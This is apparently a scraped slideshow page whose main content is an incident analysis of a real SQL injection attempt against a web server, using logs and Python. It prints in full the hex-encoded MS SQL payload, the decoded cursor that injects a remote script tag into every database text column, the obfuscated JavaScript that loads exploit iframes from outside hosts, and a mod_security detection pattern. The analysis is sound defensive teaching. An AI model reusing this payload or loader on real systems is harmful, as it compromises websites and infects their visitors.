Viewers also liked (16)

PDF
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
PDF
Advanced SQL injection to operating system full control (whitepaper)
Bernardo Damele A. G.
 
PPT
D:\Technical\Ppt\Sql Injection
avishkarm
 
PPTX
Sql injection
Hemendra Kumar
 
PPTX
SQL Injection Defense in Python
Public Broadcasting Service
 
PPTX
SQL Injection
Marios Siganos
 
DOCX
Types of sql injection attacks
Respa Peter
 
PPTX
Cross Site Scripting ( XSS)
Amit Tyagi
 
PPT
SQL Injection
Adhoura Academy
 
PPTX
Sql injection
Zidh
 
PDF
SQL injection: Not Only AND 1=1 (updated)
Bernardo Damele A. G.
 
PPTX
Sql Injection attacks and prevention
helloanand
 
PPT
Sql injection
Pallavi Biswas
 
PDF
Sql Injection Myths and Fallacies
Karwin Software Solutions LLC
 
PPTX
SQL Injections - A Powerpoint Presentation
Rapid Purple
 
PDF
How to Become a Thought Leader in Your Niche
Leslie Samuel
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
 
Advanced SQL injection to operating system full control (whitepaper)
Bernardo Damele A. G.
 
D:\Technical\Ppt\Sql Injection
avishkarm
 
Sql injection
Hemendra Kumar
 
SQL Injection Defense in Python
Public Broadcasting Service
 
SQL Injection
Marios Siganos
 
Types of sql injection attacks
Respa Peter
 
Cross Site Scripting ( XSS)
Amit Tyagi
 
SQL Injection
Adhoura Academy
 
Sql injection
Zidh
 
SQL injection: Not Only AND 1=1 (updated)
Bernardo Damele A. G.
 
Sql Injection attacks and prevention
helloanand
 
Sql injection
Pallavi Biswas
 
Sql Injection Myths and Fallacies
Karwin Software Solutions LLC
 
SQL Injections - A Powerpoint Presentation
Rapid Purple
 
How to Become a Thought Leader in Your Niche
Leslie Samuel
 
Ad

Similar to Sql injection attack_analysis_py_vo (20)

KEY
Stupid Canvas Tricks
deanhudson
 
PDF
The Ring programming language version 1.5.3 book - Part 40 of 184
Mahmoud Samir Fayed
 
PPTX
Highlights of F# lightning talk
mbhwork
 
PDF
Immutable Deployments with AWS CloudFormation and AWS Lambda
AOE
 
PDF
Mozilla とブラウザゲーム
Noritada Shimizu
 
PPTX
JavaScript Multithread or Single Thread.pptx
RAHITNATH
 
PDF
Spark Summit EU 2015: Spark DataFrames: Simple and Fast Analysis of Structure...
Databricks
 
PDF
Python, WebRTC and You (v2)
Saúl Ibarra Corretgé
 
PPTX
A miało być tak... bez wycieków
Konrad Kokosa
 
PDF
AWS EC2
whiskybar
 
PPTX
Control hijacking
Prachi Gulihar
 
PDF
Web 2 . .3 Development Services
Theawaster485
 
PDF
JavaScript Web Workers
Tobias Pfeiffer
 
PDF
JavaScript Libraries: The Big Picture
Simon Willison
 
PDF
A la découverte de TypeScript
Denis Voituron
 
PDF
The Ring programming language version 1.10 book - Part 50 of 212
Mahmoud Samir Fayed
 
PDF
Web 2 . 0 .Zero Coding Services
Theawaster485
 
PDF
Artem Storozhuk "Building SQL firewall: insights from developers"
Fwdays
 
PPT
Ember.js Tokyo event 2014/09/22 (English)
Yuki Shimada
 
PDF
Streams in Node.js
Sebastian Springer
 
Stupid Canvas Tricks
deanhudson
 
The Ring programming language version 1.5.3 book - Part 40 of 184
Mahmoud Samir Fayed
 
Highlights of F# lightning talk
mbhwork
 
Immutable Deployments with AWS CloudFormation and AWS Lambda
AOE
 
Mozilla とブラウザゲーム
Noritada Shimizu
 
JavaScript Multithread or Single Thread.pptx
RAHITNATH
 
Spark Summit EU 2015: Spark DataFrames: Simple and Fast Analysis of Structure...
Databricks
 
Python, WebRTC and You (v2)
Saúl Ibarra Corretgé
 
A miało być tak... bez wycieków
Konrad Kokosa
 
AWS EC2
whiskybar
 
Control hijacking
Prachi Gulihar
 
Web 2 . .3 Development Services
Theawaster485
 
JavaScript Web Workers
Tobias Pfeiffer
 
JavaScript Libraries: The Big Picture
Simon Willison
 
A la découverte de TypeScript
Denis Voituron
 
The Ring programming language version 1.10 book - Part 50 of 212
Mahmoud Samir Fayed
 
Web 2 . 0 .Zero Coding Services
Theawaster485
 
Artem Storozhuk "Building SQL firewall: insights from developers"
Fwdays
 
Ember.js Tokyo event 2014/09/22 (English)
Yuki Shimada
 
Streams in Node.js
Sebastian Springer
 
Ad

Recently uploaded (20)

PPTX
Chapter 5: Probability Theory and Statistics
RandyFin
 
PDF
From MVP to Full-Scale Product A Startup’s Software Journey.pdf
KodekX
 
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
PDF
NewMind AI Weekly Chronicles - August'25-Week II
NewMind AI
 
PDF
Heart disease approach using modified random forest and particle swarm optimi...
IAESIJAI
 
PDF
A comparative analysis of optical character recognition models for extracting...
IAESIJAI
 
PDF
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Chinchu40
 
PDF
Univ-Connecticut-ChatGPT-Presentaion.pdf
ry7r52mzb4
 
PPTX
Tartificialntelligence_presentation.pptx
ry7r52mzb4
 
PPTX
TLE Review Electricity (Electricity).pptx
JayPolicarpio2
 
PDF
Accuracy of neural networks in brain wave diagnosis of schizophrenia
IAESIJAI
 
PDF
Mushroom cultivation and it's methods.pdf
mailmeonrishi
 
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
PDF
Web App vs Mobile App What Should You Build First.pdf
KodekX
 
PPTX
1. Introduction to Computer Programming.pptx
bonakiduza1024
 
PDF
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
IAESIJAI
 
PDF
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
PPTX
cloud_computing_Infrastucture_as_cloud_p
mainakbhattacharya20
 
PPTX
OMC Textile Division Presentation 2021.pptx
JahangirAlam816069
 
Chapter 5: Probability Theory and Statistics
RandyFin
 
From MVP to Full-Scale Product A Startup’s Software Journey.pdf
KodekX
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
NewMind AI Weekly Chronicles - August'25-Week II
NewMind AI
 
Heart disease approach using modified random forest and particle swarm optimi...
IAESIJAI
 
A comparative analysis of optical character recognition models for extracting...
IAESIJAI
 
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Chinchu40
 
Univ-Connecticut-ChatGPT-Presentaion.pdf
ry7r52mzb4
 
Tartificialntelligence_presentation.pptx
ry7r52mzb4
 
TLE Review Electricity (Electricity).pptx
JayPolicarpio2
 
Accuracy of neural networks in brain wave diagnosis of schizophrenia
IAESIJAI
 
Mushroom cultivation and it's methods.pdf
mailmeonrishi
 
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
Web App vs Mobile App What Should You Build First.pdf
KodekX
 
1. Introduction to Computer Programming.pptx
bonakiduza1024
 
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
IAESIJAI
 
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
Encapsulation theory and applications.pdf
gurumoop
 
cloud_computing_Infrastucture_as_cloud_p
mainakbhattacharya20
 
OMC Textile Division Presentation 2021.pptx
JahangirAlam816069
 

Sql injection attack_analysis_py_vo

  • 1. Let’s play a game A true story of a web attack analysis
  • 2. Introduction  Once upon a time, there was a personal webserver running Apache with mod_security(*) module  And then, something interesting happened... (*) An extremely useful module providing an additional level of security @JirkaV
  • 3. The logfile entry  This entry appeared in the log: Message: Warning. Pattern match "(?:b(?:(?:s(?:electb(?:.{1,100}?b(?:(?:length|count|top)b.{1,100}?bfrom|fromb .{1,100}?bwhere)|.*?b(?:d(?:umpb.*bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_( ?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:;DECLARE @S CHAR(4000);SET @S. [id "950001"] [msg "SQL Injection Attack. Matched signature <cast(>"] [severity "CRITICAL"] GET /Bristol/BVC_Cambridge/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420 7661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F43 7572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379 736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E642061 2E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F722062 2E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F7220 4645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C 4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B 275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269707420 7372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D 272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074 207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043 20454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F43757273 6F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 @JirkaV
  • 4. The logfile entry  This entry appeared in the log: Message: Warning. Pattern match "(?:b(?:(?:s(?:electb(?:.{1,100}?b(?:(?:length|count|top)b.{1,100}?bfrom|fromb .{1,100}?bwhere)|.*?b(?:d(?:umpb.*bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_( ?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:;DECLARE @S CHAR(4000);SET @S. [id "950001"] [msg "SQL Injection Attack. Matched signature <cast(>"] [severity "CRITICAL"] GET /Bristol/BVC_Cambridge/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420 7661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F43 7572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379 736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E642061 2E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F722062 2E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F7220 4645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C 4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B 275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C73637269707420 7372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D 272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074 207372633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043 20454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F43757273 6F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 @JirkaV
  • 5. Peeling the first layer  Let’s focus on the important stuff:  /Bristol/BVC_Cambridge/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206 F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136 3729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626 C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D 302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B2 75D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A 2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207768657 26520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372 633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212 D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040 542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1 @JirkaV
  • 6. Peeling the first layer  Let’s focus on the important stuff:  DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206 F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136 3729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626 C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D 302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B2 75D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A 2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207768657 26520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372 633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212 D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040 542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); @JirkaV
  • 7. Peeling the first layer  Let’s focus on the important stuff:  CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206 F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136 3729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626 C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D 302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B2 75D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A 2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207768657 26520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372 633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212 D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040 542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72 @JirkaV
  • 8. Peeling the first layer  Let’s focus on the important stuff:  CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 2E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206 F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D3136 3729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626 C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D 302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B2 75D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A 2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207768657 26520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372 633D22687474703A2F2F6162632E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212 D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040 542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F434154452054616 26C655F437572736F72 @JirkaV
  • 9. Peeling the first layer  Let’s focus on the important stuff:  CAST(0x4445434C4152452 04054207661726368617228323535292C40432076617263686172283430303029204445434C41524520 5461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E6 16D652066726F6D207379736F626A6563747320612C737973636F6C756D6E7320622077686572652061 44 45 43 4C 41 D E C L A Those numbers seem to be ASCII codes in hex (base 16) 4445434C41 Let’s write a quick conversion utility ( in Python – my favourite  ) @JirkaV
  • 10. Peeling the first layer  Convert to readable text: 4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204 445434C415245205461626C655F437572736F7220435552534F5220464F52... DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor from binascii import unhexlify data = '4445434C415245204054207661726368... text = [] for idx in range(len(data)/2): text.append(unhexlify(data[2*idx:2*idx+2])) print ''.join(text) @JirkaV
  • 11. Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor @JirkaV
  • 12. Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database @JirkaV
  • 13. Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database • xtype=‘u’ => searches for object type “user table” ... @JirkaV
  • 14. Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database • xtype=‘u’ => searches for object type “user table” ... • xtype=99, 35, ... => ... containing text (use Google) @JirkaV
  • 15. Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database • xtype=‘u’ => searches for object type “user table” ... • xtype=99, 35, ... => ... containing text (use Google) • update => modifies the text in the database @JirkaV
  • 16. Peeling the first layer  Analyze the SQL command: DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETC H NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://abc.verynx.cn/w.j s"></script><!--'' where '+@C+' not like ''%"></title><script src="http://abc.ve rynx.cn/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOS E Table_Cursor DEALLOCATE Table_Cursor • sysobjects, syscolumns => targets MS SQL database • xtype=‘u’ => searches for object type “user table” ... • xtype=99, 35, ... => ... containing text (use Google) • update => modifies the text in the database • injecting this HTML code, referencing a JavaScript @JirkaV
  • 17. Summary #1  The SQL injection tries to modify data in the database serving HTML pages, hoping to inject a reference to malicious JavaScript code into every page in the database  Technically, it tries to modify any text in the database  Any web browser visiting the site after the attack would fetch and execute the JavaScript code So, what would the JavaScript do? @JirkaV
  • 18. Analyzing the JavaScript  Download the JavaScript  Downloading JavaScript alone from its URL is relatively safe. There is no command to execute it, so the browser does not interpret it and displays it as a regular text  This makes it easy to analyze  Let’s download http://abc.verynx.cn/w.js @JirkaV
  • 19. Analyzing the JavaScript  w.js analysis window.onerror=function(){return true;} if(typeof(js86h)=="undefined") { var js86h=1; function y_gVal(iz) {var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);} function y_g(name) {var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;} function cc_k() {var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime- y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}} var yesdata; yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution ='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAg ent); document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count21.51yes.com/sa.aspx?id=215052584'+yesdata+' height=0 width=0></iframe>'); document.write("<iframe width=100 height=100 src=http://mm.ll80.com/flash.htm></iframe>"); document.write("<iframe width=100 height=100 src=http://mm.ll80.com/123.htm></iframe>"); document.write ('<script>var a4452tf="51la";var a4452pu="";var a4452pf="51la";var a4452su=window.location;var a4452sf=document.referrer;var a4452of="";var a4452op="";var a4452ops=1;var a4452ot=1;var a4452d=new Date();var a4452color="";if (navigator.appName=="Netscape"){a4452color=screen.pixelDepth;} else {a4452color=screen.colorDepth;}</script><script>a4452tf=top.document.referrer;</script><script>a4452pu =window.parent.location;</script><script>a4452pf=window.parent.document.referrer;</script><script>a4452ops=document.cooki e.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a4452ops=(a4452ops==null)?1: (parseInt(unescape((a4452ops)[2]))+1);var a4452oe =new Date();a4452oe.setTime(a4452oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a4452ops+ ";path=/;expires="+a4452oe.toGMTString();a4452ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a4452ot==null){a4452ot=1;}else{a4452ot=parseInt(unescape((a4452ot)[2])); a4452ot=(a4452ops==1)?(a4452ot+1):(a4452ot);}a4452oe.setTime(a4452oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_o k_times="+a4452ot+";path=/;expires="+a4452oe.toGMTString();</script><script>a4452of=a4452sf;if(a4452pf!=="51la"){a4452of=a 4452pf;}if(a4452tf!=="51la"){a4452of=a4452tf;}a4452op=a4452pu;try{lainframe}catch(e){a4452op=a4452su;}document.write('<img style="display:hidden;width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for- Webmasters&svid=20&id=2024452&tpages='+a4452ops+'&ttimes='+a4452ot+'&tzone='+(0- a4452d.getTimezoneOffset()/60)+'&tcolor='+a4452color+'&sSize='+screen.width+','+screen.height+'&referrer='+escape(a 4452of)+'&vpage='+escape(a4452op)+'" />');</script>'); } @JirkaV
  • 20. Analyzing the JavaScript  w.js analysis – stripped down to its backbone window.onerror=function(){return true;} document.write("<iframe width=100 height=100 src=http://mm.ll80.com/flash.htm></iframe>"); document.write("<iframe width=100 height=100 src=http://mm.ll80.com/123.htm></iframe>"); @JirkaV
  • 21. Analyzing the JavaScript  Downloading the dangerous code  Since downloading the pages using a browser would do exactly what the attacker wanted, we’ll use safer approach  wget will download the HTML, but will not interpret it $ wget http://mm.ll80.com/123.htm --2008-07-23 19:55:09-- http://mm.ll80.com/123.htm Resolving mm.ll80.com... 60.173.11.119 Connecting to mm.ll80.com|60.173.11.119|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 431 [text/html] Saving to: `123.htm' @JirkaV
  • 22. Analyzing the JavaScript  Side note  At this point, I’ve switched to Linux simple because the necessary tools are easily available there and the risk of doing something stupid (such as clicking on some HTML file) is a bit smaller.  Also, any possibly malicious code is slightly less likely to work – one of the reasons is that the attacker(s) seem to target Microsoft world (MS SQL, remember?) @JirkaV
  • 23. Analyzing the injected HTML  Analyzing the HTML  Opening the HTML in a browser would be as bad as downloading it ... ... so we’ll use anything that does NOT understand HTML $ more 123.htm <iframe width=100 height=0 src=Ms06-014.htm> </iframe><iframe width=100 height=0 src=flash.htm> </iframe><iframe width=100 height=0 src=SP2.htm> </iframe><iframe width=100 height=0 src=Realplayer11.htm> </iframe><iframe width=100 height=0 src=Norton.htm> </iframe><iframe width=100 height=0 src=pxhack.htm> </iframe><script language="javascript“ type="text/javascript"src="http://js.users.51.la/2018815.js"></script> @JirkaV
  • 24. Analyzing the injected HTML  Getting some more HTML  Time to download the other referenced HTML files  Again, using “wget”  It turns out, that each HTML file targets one vulnerability, trying to exploit it and download an executable  Let’s take a look... @JirkaV
